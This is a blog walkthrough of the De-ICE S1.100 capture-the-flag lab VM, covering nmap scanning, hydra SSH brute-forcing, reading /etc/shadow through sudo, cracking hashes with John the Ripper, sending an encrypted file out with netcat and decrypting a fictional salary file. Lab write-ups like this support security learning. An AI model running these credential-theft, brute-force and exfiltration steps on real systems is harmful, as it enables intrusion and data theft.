De-ICE S1.

100 - Cheesy Rumbles

1 of 2

https://rasta-mouse.github.io/blog/2013/01/12/de-ice-s1-dot-100/

Cheesy Rumbles
of a Rasta Mouse
RSS

Blog
Write-Ups
About
Contact
Archives

De-ICE S1.100
Jan 12th, 2013 10:07 am
This is a walkthrough of how I completed the De-ICE S1.100 challenge. The end goal is to obtain the CEOs salary information.

Nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

root@kali:~# nmap -n -sV -A -p- 192.168.1.100

PORT
STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open
ftp
vsftpd (broken: could not bind listening IPv4 socket)
22/tcp open
ssh
OpenSSH 4.3 (protocol 1.99)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_sshv1: Server supports SSHv1
25/tcp open
smtp
Sendmail 8.13.7/8.13.7
| smtp-commands: slax.example.net Hello [192.168.1.200], pleased to meet you, ENHANCEDSTAT USCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, AUTH DIGEST-M D5 CRAM-MD5, DELIVERBY, HELP,
|_ 2.0.0 This is sendmail version 8.13.7 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0. 0 RSET NOOP QUIT HEL P VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0. 0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To r eport bugs in the im plementation see 2.0 .0 http://www.sendma il.org/email-addresse s.html 2.0.0 For loc al information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp open
http
Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
110/tcp open
pop3
Openwall popa3d
143/tcp open
imap
UW imapd 2004.357
|_imap-capabilities: CAPABILITY IDLE LOGIN-REFERRALS LITERAL+ THREAD=ORDEREDSUBJECT THREAD =REFERENCES SCAN MAI LBOX-REFERRALS SORT NAMESPACE STARTTLS co mpleted IMAP4REV1 OK AUTH=LOGINA0001 UNS ELECT SASL-IR BINARY MULTIAPPEND
443/tcp closed https

If you open up a web browser and go to 192.168.1.100, you will see a generic welcome page to the De-ICE challenge, with a link to see some hints if you get stuck. To see the game related page, click the link at the bottom of the page and it will take you to 192.168.1.100/index2.php.
This page contains some names and email addresses of employees. I took a copy of this information, and used it to create a list of possible usernames.

Hydra
I then attempted to use these usernames to bruteforce the SSH login.
1 root@kali: ~/de-ice/1.100# hydra -L users -e nsr 192.168.1.100 ssh
2 1 of 1 tar get completed, 0 valid passwords found

The nsr option checks for null password, login as password and reverse login as password. Unfortunately, none of these attempts were successful. Before attempting to use a large dictionary, I decided to look again at my list of users. On a hunch, I swapped the surname and first initials around, so instead of marym I had mmary etc.
I ran this through hydra again, but this time I got a successful hit.
1 [22][ssh] host: 192.168.1.100
login: bbanter
password: bbanter
2 1 of 1 tar get successfully completed, 1 valid password found

SSH & Enumeration

1 root@kali: ~/de-ice/1.100# ssh bbanter @ 192.168.1.100
2 bbanter @ 192.168.1.100's password:
3 Linux 2.6. 16.
4 bbanter@sl ax:~$

This version of Linux is running an old kernel, and is therefore likely to have privilege escalation exploits available. However there is no gcc or python installed, which would make compiling and executing such exploits difficult.
The passwd and group files yielded some interesting information.
1
2
3
4
5

bbanter@sl ax:~$ cat /etc/passwd

root:x:0:0 :DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION:/root:/bin/bash
aadams:x:1 000:10:,,,:/home/aadams:/bin/bash
bbanter:x: 1001:100:,,,:/home/bbanter:/bin/bash
ccoffee:x: 1002:100:,,,:/home/ccoffee:/bin/bash

This confirmed that these were the only three users on the system, so I went back and removed the others from my user list.
1 bbanter@sl ax:~$ cat /etc/group
2 root::0:ro ot
3 wheel::10: root
4 users::100 :

Now I knew that bbanter and ccoffee were both members of the users (gid=100) group; and aadams was in the wheel (gid=10) group. The wheel group traditionally allows its users sudo privileges and would therefore be a better account to attack compared to ccoffee.

Hyrda (again)
root@kali: ~# hydra -l aadams -P /usr/share/wordlists/passwords 192.168.1.100 ssh

The password file I used was based on the darkc0de wordlist. To save time, I did some manipulation on it to remove all lines that contained numbers and special characters. It was a gamble that the password wouldnt be too complicated. It seems I got lucky.
[22][ssh] host: 192.168.1.100 login: aadams password: nostradamus

SSH (again)
Since I was still logged in as bbanter, I used su to switch to aadams.
1 bbanter@sl ax:~$ su aadams
2 Password: ***********
3 aadams@sla x:/home/bbanter$ id
4 uid=1000(a adams) gid=10(wheel) groups=10(wheel)

My next step was to check the sudo rights of aadams.

1 aadams@sla x:~$ sudo -l
2 User aadam s may run the following commands on this host:
3
(root) NOEXEC: /bin/ls
4
(root) NOEXEC: /usr/bin/cat
5
(root) NOEXEC: /usr/bin/more
6
(root) NOEXEC: !/usr/bin/su \*root\*

This made it a rather trivial exercise to obtain the shadow file.

1 aadams@sla x:~$ sudo cat /etc/shadow
2 root:$1$TO i0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
3 aadams:$1$ 6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
4 bbanter:$1 $hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
5 ccoffee:$1 $nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::

John the Ripper

I copied these hashes to my machine and set john to work on cracking them (excluding bbanter and aadams, I kept ccoffee in there for the sake of completeness).
1 root@kali: ~/de-ice/1.100# john --rules --wordlist=/usr/share/wordlists/darkc0de.lst shadow
2 tarot
(root)

Whilst john was working on these hashes, I used aadams sudo ls rights to browse the file system and eventually came across /home/ftp/inco ming/salary_dec2003. csv.enc. I was able to sudo cat the file, which appeared to be in binary, but it could be piped to strings and more, to make some parts of it readable.
aadams@sla x:~$ sudo cat /home/ftp/incoming/salary_dec2003.csv.enc | strings | more

A little research into the string Salted__, revealed this was a file encrypted using OpenSSL.

OpenSSL
There are lots of options within OpenSSL for encrypting files, different ciphers etc. To this end, I wrote a script that would attempt each cipher on the encrypted file - not forgetting the little clue in the passwd file: DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION. This indicated to me that the root password was used during the encryption and that it would be required for the decryption (good job john was able to crack the hash for root).
To make this task a bit easier, I wanted to transfer the file to my Kali machine. There is a (broken) FTP service running, but instead of spending time fixing that to transfer the file, I used netcat instead.
root@kali: ~/de-ice/1.100# nc -lnvvp 4444 > salary_dec2003.csv.enc

Switch to the root user, and

1 aadams@sla x:~$ su 2 Password: *****
3
4 root@slax: ~# cd /home/ftp/incoming/
5 root@slax: /home/ftp/incoming# nc 192.168.1.200 4444 < salary_dec2003.csv.enc

1
2
3
4
5
6
7
8
9
10
11
12
13

#!/bin/bash
openssl=/usr/bin/openssl
ciphers=$($openssl list-cipher -commands)
key=tarot
in=salary _dec2003.csv.enc
out=salar y_dec2003.csv
for i in $ciphers; do
$openssl enc -d -${i} -in ${in} -k ${key} > /dev/null 2>&1;
if [[ $? == 0 ]]; then
$openssl enc - d -${i} -in ${in} -k ${key} -out ${out}
echo "Successfully decrypted with ${i} and ${key}"
exit 0; fi
done

1
2
3
4
5
6
7
8
9
10

,1,Charles E. Ophenia,"$225,000.00",1,4,2.30%,28.00%,6.30%,1.45%,38.05%,$360.00,$500.00,$860.00,183200299,1123245
,2,Marie Mary,"$56,000.00",1,2,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$100.00,$225.00,183200299,1192291
,3,Pat Patrick,"$43,350.00",1,1,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,2334432
,4,Terry Thompson,"$27,500.00" ,1,4,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$225.00,$350.00,183200299,1278235
,5,Ben Benedict,"$29,750.00",1,3,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$122.50,$247.50,1 83200299,2332546
,6,Erin Gennieg,"$105,000.00",1,4,2.30%,28.00%,6.30%,1.45%,38.05%,$125 .00,$0.00,$125.00,183200299,1456567
,7,Paul Michael,"$76,000.00",1,2,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$100.00,$225.00,1 83200299,1446756
,8,Ester Long,"$92,500.00",1,2,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,18320 0299,1776782
,9,Adam Adams,"$76,250.00",1,5,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,18320 0299,2250900
,10,Chad Coffee,"$55,000.00",1,1,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,1590264

Posted by Rasta Mouse Jan 12th, 2013 10:07 am de-ice, write-ups

Tweet

De-ICE S1.110

Comments
0 Comments

Twitter

1/6/2015 12:54 PM

De-ICE S1.100 - Cheesy Rumbles

2 of 2

Tweets

https://rasta-mouse.github.io/blog/2013/01/12/de-ice-s1-dot-100/

Follow

BSidesLondon
@BSidesLondon

10h

Just want to let everyone know the core

team is getting organised for BSidesLondon
2015... watch this space!
Retweeted by Rasta Mouse
Expand
Vuln Hub
@VulnHub

12h

Brand new VM!

The Purge by strata ~
vulnhub.com/entry/the-purg
Retweeted by Rasta Mouse
Expand
offensive security
@offsectraining

14h

Kali #NetHunter 1.1 released | Transparent

Backdooring of executables over HTTP |
Native mgmt app | OnePlus support |
offensive-security.com/kali-nethunter
Retweeted by Rasta Mouse
Expand
Rasta Mouse
@_RastaMouse

15h

@digininja got my vote mate!!!

Expand

Tweet to @_RastaMouse

External Links

People
Barrebas
TheColonial
g0tmi1k
superkojiman
recrudesce
Leonjza
Knapsy
Arr0way

Orgs
VulnHub
Copyright 2015 - Rasta Mouse - Octopress

1/6/2015 12:54 PM